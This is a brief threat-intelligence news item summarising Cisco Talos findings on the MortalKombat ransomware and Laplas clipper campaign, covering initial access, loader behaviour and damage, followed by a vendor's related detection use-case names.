‘MortalKombat’ Ransomware Emerges

Category: Ransomware News | Industry: Global | Level: Tactical | Source: Cisco Talos

Cybercriminals have launched a new financially motivated ransomware campaign with the ‘MortalKombat' ransomware strain. The threat actors also deploy a Go variant of the Laplas clipper malware, capable of monitoring for crypto addresses in the Windows clipboard and replacing them with the attacker's crypto address to siphon funds. Cisco Talos reports the threat actors obtained initial access through exposed RDP ports or from phishing campaigns themed as failed cryptocurrency transactions. Within the phishing email, a malicious BAT loader script executes with LOLBins (living-off-the-land binaries) such as Bitsadmin and cscript downloading either the Laplas malware or MortalKombat ransomware.

Cisco Talos discovered the MortalKombat ransomware in January 2023, assessing the malware to be part of the Xorist ransomware variant. Campaigns launched by MortalKombat operators have targeted individuals and businesses located in the United States, United Kingdom, Turkey, and the Philippines. The MortalKombat encryptor does damage beyond typical encryptors since it'll encrypt system files and applications that other variants would have otherwise left untouched. As observed by Cisco Talos, "MortalKombat did not show any wiper behavior or delete the volume shadow copies on the victim’s machine. Still, it corrupts Windows Explorer, removes applications and folders from Windows startup, and disables the Run command window on the victim’s machine, making it inoperable."

Anvilogic Scenario:

• Malicious File Delivering Malware

Anvilogic Use Cases:

• Compressed File Execution
• Executable Create Script Process
• Wscript/Cscript Execution

‍